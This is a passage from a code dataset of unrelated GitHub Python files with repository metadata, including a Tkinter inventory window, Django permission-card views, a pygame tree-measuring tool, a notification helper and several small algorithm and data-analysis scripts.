dependencies.get('category', [])\n \n domains = set(value.split(self.delim))\n \n if 'wireless' in domains or 'dmz' in domains:\n domains.add('trust')\n\n if 'pci' in categories:\n domains.add('trust')\n \n if 'cardholder' in categories:\n domains.update(['trust', 'cardholder'])\n\n # Discard empty entries.\n domains.discard('')\n \n # Update list of all PCI domains\n self._all_values.update(domains)\n \n # Return multi-valued IFF there is only more than one item.\n if len(domains) == 0:\n return ('untrust', NOT_DEFERRED)\n elif len(domains) == 1:\n return (domains.pop(), NOT_DEFERRED)\n else:\n return (list(domains), NOT_DEFERRED)\n","repo_name":"aloualou/DCOM_deployment_apps_beta","sub_path":"SA-Utils/lib/SolnCommon/lookup_conversion/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":43425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14797600340","text":"import base64\nimport tkinter as tk\nimport assets.style as style\n\nfrom database.raw import RawSQL\nfrom database.product import ProductSQL\nfrom database.raw_product import RawProductSQL\nfrom tkinter import filedialog\n\nclass WindowRawDetail(tk.Frame):\n\n def __init__(self, frame_options, main_window, raw_id):\n tk.Frame.__init__(self, frame_options)\n self.main_window = main_window\n\n tk.Button(self, text='📄 Back To List', command=lambda: main_window.show_raw_list(self)) \\\n .grid(column=0, row=0, sticky='ew', padx=(25, 25), pady=(25, 25))\n tk.Label(self, text='CSSP - Material Detail', font=style.title_font).grid(column=1, row=0, padx=(0, 25))\n\n rawSQL = RawSQL()\n self.raw = rawSQL.GetSingle(raw_id)\n\n tk.Label(self, text=\"Name\").grid(row=1, sticky='w', padx=(25, 0), pady=(0, 5))\n tk.Entry(self, textvariable=self.raw.name).grid(row=1, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Date of Purchase\").grid(row=2, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.date_of_purchase).grid(row=2, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Name of Supplier\").grid(row=3, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.name_of_supplier).grid(row=3, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Storage Expiration Date\").grid(row=4, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.storage_expiration_date).grid(row=4, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Storage Code\").grid(row=5, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.storage_code).grid(row=5, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Description\").grid(row=6, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.description).grid(row=6, column=1, padx=(0, 25), sticky='ew')\n\n productSQL = ProductSQL()\n products = productSQL.GetAll()\n rawProductSQL = RawProductSQL()\n selected_products = rawProductSQL.GetRawProducts(raw_id)\n mb = tk.Menubutton(self, text=\"👇🏻 Select Products From List\", relief=tk.RAISED)\n mb.menu = tk.Menu(mb, tearoff=0)\n mb[\"menu\"] = mb.menu\n self.menu_products = {}\n for product in products:\n if int(product.id.get()) in selected_products:\n default_value = 1\n else:\n default_value = 0\n var = tk.IntVar(value=default_value)\n mb.menu.add_checkbutton(label=product.name.get(), variable=var, onvalue=1, offvalue=0)\n self.menu_products[product.id.get()] = var\n mb.grid(row=7, columnspan=2, sticky='ew', padx=(25, 25), pady=(5, 0))\n\n tk.Button(self, text=\"🌇 Take Image\", command=lambda: self.UploadFile()) \\\n .grid(row=8, sticky='ew', padx=(25, 5), pady=(5, 5))\n tk.Button(self, text=\"🗑️ Delete Image\", command=self.DeleteFile) \\\n .grid(row=8, column=1, sticky='ew', padx=(5, 25), pady=(5, 5))\n if self.raw.image:\n stock_image = tk.PhotoImage(data=base64.b64decode(self.raw.image))\n self.raw_image = tk.Label(self, image=stock_image)\n self.raw_image.image = stock_image\n self.raw_image.grid(row=9, columnspan=2, padx=(25, 25), pady=(5, 5))\n else:\n self.raw_image = tk.Label(self)\n\n tk.Button(self, text=\"✔️ Update\", command=self.UpdateRaw) \\\n .grid(row=10, columnspan=2, sticky='ew', padx=(25, 25), pady=(0, 5))\n tk.Button(self, text=\"❌ Delete\", command=self.DeleteRaw) \\\n .grid(row=11, columnspan=2, sticky='ew', padx=(25, 25), pady=(0, 25))\n\n def UploadFile(self):\n filename = filedialog.askopenfilename(filetypes=[('Png Files', '*.png')])\n if filename:\n img = tk.PhotoImage(file=filename)\n\n if self.raw_image:\n self.raw_image.destroy()\n self.raw_image = tk.Label(self, image=img)\n self.raw_image.image = img\n self.raw_image.grid(row=9, columnspan=2, padx=(25, 25), pady=(5, 5))\n\n self.raw.image = base64.b64encode(open(filename, 'rb').read()) #for saving the image to the database. type conversion is required.\n\n def DeleteFile(self):\n if self.raw_image:\n self.raw_image.destroy()\n self.raw.image = None\n\n def UpdateRaw(self): #the code allows us to see n pieces of data so that it is extensible\n self.raw.Update()\n rawProductSQL = RawProductSQL()\n rawProductSQL.DeleteRawProducts(self.raw.id.get())\n for product_id in self.menu_products:\n if self.menu_products[product_id].get() == 1:\n rawProductSQL.Insert(product_id, self.raw.id.get())\n self.main_window.show_raw_list(self)\n\n\n def DeleteRaw(self):\n rawProductSQL = RawProductSQL()\n rawProductSQL.DeleteRawProducts(self.raw.id.get())\n #Before raw is deleted, the raw_product table row's it depends on must be deleted.\n #If raw_prodcut table row's are not deleted, raw will get foreign key error while deleting.\n self.raw.Delete()\n self.main_window.show_raw_list(self)\n","repo_name":"nisaerarslan/cooking-stock-","sub_path":"Final Proje/proje/window_raw_detail.py","file_name":"window_raw_detail.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33396806494","text":"'''\n20180120\tjlhung\tv1.0\n'''\n\nimport math\n\nwhile True:\n\tn = int(input())\n\tif n == 0:\n\t\tbreak\n\t\n\tc = 0\n\td = n\n\ti = 2\n\twhile i < math.sqrt(n):\n\t\tif n % i == 0:\n\t\t\tc += 1\n\t\twhile n % i == 0:\n\t\t\tn /= i\n\t\ti += 1\n\tif n != 1:\n\t\tc += 1\n\tprint(\"{} : {}\".format(d, c))\n\t","repo_name":"jlhung/UVA-Python","sub_path":"10699 - Count the factors.py","file_name":"10699 - Count the factors.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"70"}
+{"seq_id":"73512615267","text":"'''Tools for sending notifications.'''\n\nimport datetime\nimport os\nimport subprocess\nimport time\n\n\n# Attemp to use ToastNotifier (if installed) on Windows.\ntry:\n from win10toast import ToastNotifier\nexcept ImportError:\n print('No ToastNotifier module installed for notifications')\nelse:\n TOASTER = ToastNotifier()\n\n\ndef ns(title='Hello!', msg='', icon_path=None, duration=5, threaded=True, max_tries=5):\n '''Sends a desktop notification.'''\n msg = msg or 'Have a good {}!'.format(datetime.datetime.now().strftime('%A'))\n if os.name == 'nt':\n if 'TOASTER' not in globals():\n raise Exception('Not sure how to send notification without ToastNotifier')\n\n for tries in range(max_tries):\n try:\n res = TOASTER.show_toast(\n title=title, msg=msg, icon_path=icon_path, duration=duration, threaded=threaded)\n except Exception as err:\n print('Failed to send ({}/{}):\\n{}'.format(tries, max_tries, err))\n time.sleep(duration)\n else:\n if res:\n break\n # If res is False, it means notification wasn't sent, so we try again.\n time.sleep(duration)\n else:\n subprocess.call(\"ns '%s'\" % msg, shell=True)\n","repo_name":"leonardlan/myTools","sub_path":"python/notify_tools.py","file_name":"notify_tools.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"27241354726","text":"import pygame\nfrom info import Info\ntry:\n from win32api import GetSystemMetrics\nexcept ModuleNotFoundError:\n pass\n\nclass Image:\n\n def __init__(self, program, screen, image):\n self.program = program\n self.screen = screen\n self.image = image\n self.min_height = 1000\n self.max_height = 1\n self.points = []\n\n self.message_box = pygame.image.load(\"images/message_box.png\")\n self.message_box = pygame.transform.scale(self.message_box, (round(self.message_box.get_width() / 3), round(self.message_box.get_height() / 3)))\n self.message_box_rect = self.message_box.get_rect()\n self.message_box_rect.x = 0\n self.message_box_rect.y = 0\n self.begin1 = True\n self.begin2 = True\n\n self.scale_box = pygame.image.load(\"images/input.png\")\n # self.scale_box = pygame.transform.scale()\n self.scale_box_rect = self.scale_box.get_rect()\n self.scale_box_rect.x = self.message_box_rect.x + self.message_box.get_width()\n self.scale_box_rect.y = 0\n\n self.cursor = pygame.image.load(\"images/cross3.png\")\n self.cursor_rect = self.cursor.get_rect()\n\n self.position_list = []\n self.keys = {}\n self.phrase1 = \"\"\n self.phrase2 = \"\"\n self.part = \"phrase1\"\n\n self.backwards_button = pygame.image.load(\"images/back_new.png\")\n self.backwards_button = pygame.transform.scale(self.backwards_button, (75, 50))\n self.backwards_button_rect = self.backwards_button.get_rect()\n self.backwards_button_rect.x = 20\n self.backwards_button_rect.y = 110\n\n self.done_button = pygame.image.load(\"images/new_done_button.png\")\n self.done_button = pygame.transform.scale(self.done_button, (100, 100))\n self.done_button_rect = self.done_button.get_rect()\n self.done_button_rect.x = 20\n self.done_button_rect.y = 210\n\n self.font = pygame.font.SysFont(\"Liberation Serif\", 20)\n\n self.bar = pygame.image.load(\"images/barrier.png\")\n self.bar = pygame.transform.scale(self.bar, (self.screen.get_width(), 20))\n self.bar_rect = self.bar.get_rect()\n self.bar_rect.x = 0\n self.bar_rect.y = 100\n\n self.info = Info(self.program, self.screen)\n\n self.loop = 0\n self.max_loop = 300\n\n\n\n ##############\n self.leaf_lines = []\n\n def renew_images(self):\n self.bar = pygame.transform.scale(self.bar, (self.screen.get_width(), 20))\n\n def show_scale(self, mx, my):\n if self.program.settings.info_bar_state:\n self.info.box_top((\"STEP 1\", \"Locate your scaling object on the screen\"))\n self.screen.blit(self.image, (0, 100))\n\n else:\n self.info.box_bottom((\"STEP 1\", \"Locate your scaling object on the screen\"))\n self.screen.blit(self.image, (0, 0))\n\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n\n if len(self.position_list) == 1:\n self.cursor_rect.x = mx - 25\n self.cursor_rect.y = self.position_list[0][1] - 25\n elif len(self.position_list) == 3:\n self.cursor_rect.x = self.position_list[2][0] - 25\n self.cursor_rect.y = my - 25\n else:\n self.cursor_rect.x = mx - 25\n self.cursor_rect.y = my - 25\n\n self.screen.blit(self.cursor, (self.cursor_rect.x, self.cursor_rect.y))\n count = 1\n for point in self.position_list:\n if count == 2:\n self.screen.blit(self.cursor, (self.position_list[1][0] - 25, self.position_list[0][1] - 25))\n elif count == 4:\n self.screen.blit(self.cursor, (self.position_list[2][0] - 25, self.position_list[3][1] - 25))\n else:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n count += 1\n if len(self.position_list) == 4:\n self.program.case += 1\n\n def input_scale(self, mx, my):\n self.program.enable_text_input = True\n if self.keys.get(\"enter\") and self.part == \"phrase1\":\n self.part = \"phrase2\"\n self.keys[\"enter\"] = False\n elif self.keys.get(\"enter\") and self.part == \"phrase2\":\n self.program.case += 1\n self.program.hover.remove_all()\n self.program.hover.add_name(\n \"done_button\",\n self.done_button.get_width(),\n self.done_button.get_height(),\n (self.done_button_rect.x, self.done_button_rect.y),\n \"images/done_button_new_black.png\"\n )\n self.program.hover.add_name(\n \"backwards_button\",\n self.backwards_button.get_width(),\n self.backwards_button.get_height(),\n (self.backwards_button_rect.x, self.backwards_button_rect.y),\n \"images/back_new_black.png\"\n )\n self.program.hover.add_name(\n \"settings_button\",\n self.program.settings.button.get_width(),\n self.program.settings.button.get_height(),\n (self.program.settings.button_rect.x, self.program.settings.button_rect.y)\n )\n self.program.hover.reset()\n self.keys[\"enter\"] = False\n elif self.keys.get(\"back_space\") and self.part == \"phrase1\": # and not self.program.cooldown\n new_phrase = \"\"\n count = 1\n if self.phrase1 == \"\":\n self.keys[\"back_space\"] = False\n else:\n for e in self.phrase1:\n if count == len(self.phrase1):\n self.keys[\"back_space\"] = False\n self.phrase1 = new_phrase\n # self.program.cooldown = True\n break\n else:\n new_phrase += e\n count += 1\n\n elif self.keys.get(\"back_space\") and self.part == \"phrase2\": # and not self.program.cooldown\n new_phrase = \"\"\n count = 1\n if self.phrase2 == \"\":\n self.keys[\"back_space\"] = False\n else:\n for e in self.phrase2:\n if count == len(self.phrase2):\n self.keys[\"back_space\"] = False\n self.phrase2 = new_phrase\n # self.program.cooldown = True\n break\n else:\n new_phrase += e\n count += 1\n\n if self.program.settings.info_bar_state:\n self.info.box_top((\"STEP 2\", \"Enter the scale in meters\"))\n self.screen.blit(self.image, (0, 100))\n if self.part == \"phrase1\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1 + \"|\", None), (500, 10), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30))\n self.loop += 1\n elif self.part == \"phrase2\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10))\n self.info.custom_message((\"Y : \" + self.phrase2 + \"|\", None), (500, 30), (255, 0, 0))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30), (255, 0, 0))\n self.loop += 1\n\n\n\n else:\n self.info.box_bottom((\"STEP 2\", \"Enter the scale in meters\"))\n self.screen.blit(self.image, (0, 0))\n if self.part == \"phrase1\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1 + \"|\", None), (500, self.screen.get_height()-90), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70))\n self.loop += 1\n elif self.part == \"phrase2\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90))\n self.info.custom_message((\"Y : \" + self.phrase2 + \"|\", None), (500, self.screen.get_height()-70), (255, 0, 0))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70), (255, 0, 0))\n self.loop += 1\n\n\n\n\n\n if self.loop == self.max_loop:\n self.loop = 0\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n\n\n count = 1\n if self.part == \"phrase1\":\n for point in self.position_list:\n if count == 1:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n elif count == 2:\n self.screen.blit(self.cursor, (self.position_list[1][0] - 25, self.position_list[0][1] - 25))\n count += 1\n else:\n for point in self.position_list:\n if count == 3:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n elif count == 4:\n self.screen.blit(self.cursor, (self.position_list[2][0] - 25, self.position_list[3][1] - 25))\n count += 1\n\n\n\n\n def precise_image(self, mx, my):\n if not self.program.right_click_pressed[1] and self.program.was_pressed:\n if self.program.started:\n self.program.position2x = mx\n self.program.position2y = my\n\n #add in database\n\n self.program.draw_line.register(self.program.position1x, self.program.position2x, self.program.position1y, self.program.position2y)\n self.program.position1x = self.program.position2x\n self.program.position1y = self.program.position2y\n self.program.was_pressed = False\n\n else: # start the program (get the first coordinates)\n self.program.position1x = mx\n self.program.position1y = my\n # define the function as started\n self.program.started = True\n self.program.was_pressed = False\n\n\n if self.program.settings.info_bar_state:\n self.screen.blit(self.image, (0, 100))\n self.info.box_top((\"STEP 3\",\n \"By using your mouse,click around the image to let the computer know were the tree is.\",\n \"When you have finished, press the top right button\"\n ))\n else:\n self.screen.blit(self.image, (0, 0))\n self.info.box_bottom((\"STEP 3\",\n \"By using your mouse,click around the image to let the computer know were the tree is.\",\n \"When you have finished, press the top right button\"\n ))\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.backwards_button, (self.backwards_button_rect.x, self.backwards_button_rect.y))\n self.screen.blit(self.done_button, (self.done_button_rect.x, self.done_button_rect.y),\n special_flags=4) # 3 &nd 4\n\n\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n self.program.draw_line.update(self.leaf_lines)\n\n\n\n\n\n\n\n def resize_image(self):\n width = self.image.get_width()\n height = self.image.get_height()\n c_width = GetSystemMetrics(0)\n c_height = GetSystemMetrics(1)\n\n if width < c_width/1.2 or height < c_height/1.2-100:\n while width < c_width/1.2-400 or height < c_height/1.2-500:\n if width * 1.1 < c_width/1.7-200 or height < height * 1.1:\n width *= 1.1\n height *= 1.1\n else:\n width *= 1.05\n height *= 1.05\n\n elif width > c_width/1.2 or height > c_height/1.2-100:\n while width > c_width/1.2-400 or height > c_height/1.2-500:\n width /= 1.1\n height /= 1.1\n\n width = round(width)\n height = round(height)\n self.screen_x = width\n self.screen_y = height\n self.image = pygame.transform.scale(self.image, (width, height))\n pygame.display.set_mode((width, height+100))\n\n self.done_button_rect.x = self.screen.get_width()- 100\n self.done_button_rect.y = 0\n\n #here I load images\n self.right_button = pygame.image.load(\"images/right.png\")\n self.right_button = pygame.transform.scale(self.right_button, (100, 100))\n self.right_button_rect = self.right_button.get_rect()\n self.right_button_rect.x = self.image.get_width()-self.right_button.get_width()\n self.right_button_rect.y = 0\n\n self.transparent_green = pygame.image.load(\"images/transparent.png\")\n self.transparent_green = pygame.transform.scale(self.transparent_green,(self.screen.get_width(), self.screen.get_height()))\n self.transparent_green_rect = self.transparent_green.get_rect()\n\n self.final_message_box = pygame.image.load(\"images/message_box4.png\")\n self.final_message_box = pygame.transform.scale(self.final_message_box, (round(self.final_message_box.get_width() / 1.75), round(self.final_message_box.get_height() / 1.75)))\n self.final_message_box_rect = self.final_message_box.get_rect()\n self.final_message_box_rect.x = (self.screen.get_width() - self.final_message_box.get_width()) / 2\n self.final_message_box_rect.y = (self.screen.get_height() - self.final_message_box.get_height()) / 2.5\n\n self.save_button = pygame.image.load(\"images/save.png\")\n self.save_button = pygame.transform.scale(self.save_button, (round(self.save_button.get_width() / 2), round(self.save_button.get_height() / 2)))\n self.save_button_rect = self.save_button.get_rect()\n self.save_button_rect.x = round((self.screen.get_width() - self.save_button.get_width()) / 2)\n\n e = (self.final_message_box_rect.y + self.final_message_box.get_height() + self.save_button.get_height())\n self.save_button_rect.y = round(self.final_message_box_rect.y + self.final_message_box.get_height() + (self.screen.get_height() - e) / 2)\n\n\n\n def get_parameters(self, mx, my):\n if not self.program.right_click_pressed[1] and self.program.was_pressed:\n self.position_list.append([mx, my])\n self.program.was_pressed = False\n\n\n\n","repo_name":"game-geek/treevolumecalculator","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":15691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"2302367502","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import permissioncard_form\nfrom .models import permissioncard\nfrom account.models import User\nfrom datetime import datetime\n\n# Create your views here.\n\n@login_required(login_url='/home/login')\ndef permissioncardpage(request):\n if request.session['is_DOD'] or request.session['is_abla'] or request.session['is_security']:\n card_data=permissioncard.objects.all()\n else:\n user = User.objects.get(username = request.session['username'])\n card_data=permissioncard.objects.filter(name=user.name, Class=user.Class)\n response={'permissioncard': card_data}\n return render(request, 'permissioncardpage.html', response)\n\ndef form_permissioncard(request):\n form = permissioncard_form(request.POST or None)\n\n if(request.method == 'POST' and form.is_valid()) :\n form_data = form.save(commit=False)\n id = \"PC\" + str(permissioncard.objects.all().count() + 1)\n form_data.id = id\n user = User.objects.get(username = request.session['username'])\n form_data.name = user.name\n form_data.Class = user.Class\n form_data.save()\n\n response = {'form' : form}\n return render(request, 'permissioncardform.html', response)\n\ndef dod_approval(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_dod = \"Approved\"\n data.save(update_fields=['approval_dod'])\n return redirect(\"/\")\n\ndef dod_reject(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_dod = \"Not approved\"\n data.save(update_fields=['approval_dod'])\n return redirect(\"/\")\n\ndef security_depart(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_security_start = datetime.now()\n data.save(update_fields=['approval_security_start'])\n return redirect(\"/\")\n\ndef security_arrive(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_security_finish = datetime.now()\n data.save(update_fields=['approval_security_finish'])\n return redirect(\"/\")","repo_name":"sopigoo/ODLES","sub_path":"permissioncard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26330792574","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 9 17:39:40 2022\r\n\r\n@author: Sai pranay\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nmm = pd.read_csv(\"E:\\DATA_SCIENCE_ASS\\ASSOCIATION RULES\\\\my_movies.csv\")\r\nprint(mm)\r\nmm.shape\r\nlist(mm)\r\nmm.describe()\r\nmm.info()\r\n\r\n\r\nmm1 = mm.drop(['V1','V2','V3','V4','V5'],axis = 1)\r\nmm1\r\n\r\n#---------------------checking_for_null_values---------------------------------\r\n\r\nmm1.isnull().sum()\r\n\r\n#-----------------------GETTIG_DUMMY_VALUE-------------------------------------\r\n\r\nm_m=pd.get_dummies(mm1)\r\nprint(m_m)\r\nm_m.shape\r\nm_m.info()\r\n\r\n\r\nfrom mlxtend.frequent_patterns import apriori,association_rules\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\n\r\n#---------------------------Apriori Algorithm----------------------------------\r\nproduct = apriori(m_m, min_support=0.1, use_colnames=True)\r\nprint(product)\r\n\r\n\r\nrule = association_rules(product, metric=\"lift\", min_threshold=0.7)\r\nrule\r\n\r\n\r\nrule.sort_values('lift',ascending = False)\r\n\r\nrule.sort_values('lift',ascending = False)[0:20]\r\n\r\nrule[rule.lift>1]\r\n\r\nrule[['support','confidence']].hist()\r\n\r\nrule[['support','confidence','lift']].hist()\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.scatter(rule['support'], rule['confidence'])\r\nplt.show()\r\n\r\n\r\nimport seaborn as sns\r\nsns.scatterplot('support', 'confidence', data=rule, hue='antecedents')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Saipranay009/ASSOCIATION-RULES","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4318697422","text":"# Common database of hostnames, IPs, and MAC addresses for DHCP, DNS,\n# and other tools.\n\nDEFAULT_DOMAIN = '__DOMAIN__'\nLOC_NETWORK = '__LOC_NETWORK__'\nLOC_NETWORK_PREFIX = '__LOC_NETWORK_PREFIX__'\nLOC_NETMASK_SHORT = '__LOC_NETMASK_SHORT__'\nDMZ_NETWORK = '__DMZ_NETWORK__'\nDMZ_NETWORK_PREFIX = '__DMZ_NETWORK_PREFIX__'\nDMZ_NETMASK_SHORT = '__DMZ_NETMASK_SHORT__'\n\nSYSTEM_DATABASE_LOC = [\n { 'host': '__HOSTNAME__',\n 'mac': '__ETH1_MAC__',\n 'ip': '__ETH1_IP__',\n },\n ]\n\nSYSTEM_DATABASE_DMZ = [\n { 'host': '__HOSTNAME__-dmz',\n 'mac': '__ETH2_MAC__',\n 'ip': '__ETH2_IP__',\n 'aliases': ('ns1',),\n },\n ]\n","repo_name":"mikerenfro/firewall-bootstrap","sub_path":"system_database.py","file_name":"system_database.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"17714768152","text":"# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\tBy Javier León Palomares, University of Granada, 2018 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nfrom NSGA_II_Feature_SelectionSVM import *\nimport numpy as np\nimport time\nimport multiprocessing\n\nif __name__ == '__main__':\n\n\tdata = {'train': np.load(\"../data/data_training_104.npy\"),\n\t\t\t'test': np.load(\"../data/data_test_104.npy\")}\n\n\tlabels = {'train': np.load(\"../data/labels_training_104.npy\"),\n\t\t\t 'test': np.load(\"../data/labels_test_104.npy\")}\n\n\tcores = [x for x in range(2,multiprocessing.cpu_count()+1)]\n\n\tstart_sequential = time.time()\n\n\tpopulation, sort_scores, evaluation = \\\n\t\tFeatureSelection(data=data,labels=labels,max_features=50,\n\t\t\tobjective_funcs=[KappaLoss,CrossValidationLoss],\n\t\t\tpop_size=100,generations=50,seed=29,crossover_prob=0.9,\n\t\t\tcrossover_func=UniformCrossover,mutation_prob=1.0,\n\t\t\tmutation_func=FlipBitsMutation,pool_fraction=0.5,\n\t\t\tn_cores=1,show_metrics=False)\n\n\tprint(\"Sequential:\")\n\tprint(time.time() - start_sequential)\n\tprint(\"Parallel:\")\n\n\tfor n_core in cores:\n\n\t\tstart_parallel = time.time()\n\n\t\tpopulation, sort_scores, evaluation = \\\n\t\t\tFeatureSelection(data=data,labels=labels,max_features=50,\n\t\t\t\tobjective_funcs=[KappaLoss,CrossValidationLoss],\n\t\t\t\tpop_size=100,generations=50,seed=29,crossover_prob=0.9,\n\t\t\t\tcrossover_func=UniformCrossover,mutation_prob=1.0,\n\t\t\t\tmutation_func=FlipBitsMutation,pool_fraction=0.5,\n\t\t\t\tn_cores=n_core,show_metrics=False)\n\n\t\tprint(\"%d %f\" % (n_core,time.time() - start_parallel))\n","repo_name":"jleon95/UGR_TFG","sub_path":"src/FS_SequentialvsParallel.py","file_name":"FS_SequentialvsParallel.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"74320562786","text":"import sys\n\n#deque의 rotate함수로 쉽게 회전하기 위해 import\nfrom collections import deque\ninput=sys.stdin.readline\n\n#왼쪽 부분 회전\ndef left_rotate(idx,d):\n #같은 극이거나 왼쪽 범위를 초과할 경우 return\n if idx<0 or command[idx]==0:\n return\n wheel[idx].rotate(-d)\n left_rotate(idx-1,-d)\n \ndef right_rotate(idx,d):\n #같은극이거나 오른쪽 범위를 초과할 경우 return\n if idx>3 or command[idx-1]==0:\n return\n wheel[idx].rotate(-d)\n right_rotate(idx+1,-d)\n\n#현재 마주하는 극의 상태를 저장\ndef is_rotate():\n command.clear()\n if wheel[0][2]!=wheel[1][6]:\n command.append(1)\n else:\n command.append(0)\n if wheel[1][2]!=wheel[2][6]:\n command.append(1)\n else:\n command.append(0)\n if wheel[2][2]!=wheel[3][6]:\n command.append(1)\n else:\n command.append(0)\n\n#deque를 담을 wheel 선언\nwheel={}\nfor i in range(4):\n wheel[i]=deque(list(map(int,input().strip())))\n \nk=int(input())\n\ncommand=[]\n\nfor _ in range(k):\n a,b=map(int,input().split())\n is_rotate()\n left_rotate(a-2,b)\n right_rotate(a,b)\n #자기자신도 회전\n wheel[a-1].rotate(b)\nans=0\ntemp=0\n\n#12시방향에 따라서 점수 올림 (2의 n승)\nfor i in range(4):\n if wheel[i][0]==1:\n ans+=2**temp\n temp+=1\n \nprint(ans)\n","repo_name":"JJONGHYUNI/algorithm","sub_path":"2022/bakjoon/python/implementation/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20509188648","text":"\"\"\"Setup script for the DEODR project.\"\"\"\n\nimport os\nimport re\nfrom setuptools import setup, find_packages\n\nfrom Cython.Build import cythonize\n\nimport numpy as np\n\n\n# compilation mode for debuging\n# extensions = [\n# Extension(\"differentiable_renderer_cython\",\n# [\"DEODR/differentiable_renderer_cython.pyx\"]\n# ,extra_compile_args=[\"-Zi\", \"/Od\"]\n# ,extra_link_args=[\"-debug\"],\n# undef_macros = [ \"NDEBUG\" ]\n# )\n# ]\n\nextensions = \"deodr/differentiable_renderer_cython.pyx\"\n\nmy_modules = cythonize(extensions, annotate=True, language=\"c++\")\n\nlibname = \"deodr\"\n\nwith open(os.path.join(os.path.dirname(__file__), \"deodr\", \"__init__.py\")) as fp:\n for line in fp:\n m = re.search(r'^\\s*__version__\\s*=\\s*([\\'\"])([^\\'\"]+)\\1\\s*$', line)\n if m:\n version = m.group(2)\n break\n else:\n raise RuntimeError(\"Unable to find own __version__ string\")\nprint(f\"version = {version}\")\nsetup(\n name=libname,\n version=version,\n author=\"Martin de La Gorce\",\n author_email=\"martin.delagorce@gmail.com\",\n description=\"A differentiable renderer with Pytorch,Tensorflow and Matlab interfaces.\",\n url=\"https://github.com/martinResearch/DEODR\",\n license=\"BSD\",\n packages=find_packages(),\n package_data={\"deodr\": [\"*.pyx\", \"*.pxd\", \"data/*.*\", \"data/**/*.*\"]},\n data_files=[(\"C++\", [\"C++/DifferentiableRenderer.h\"])],\n ext_modules=my_modules, # additional source 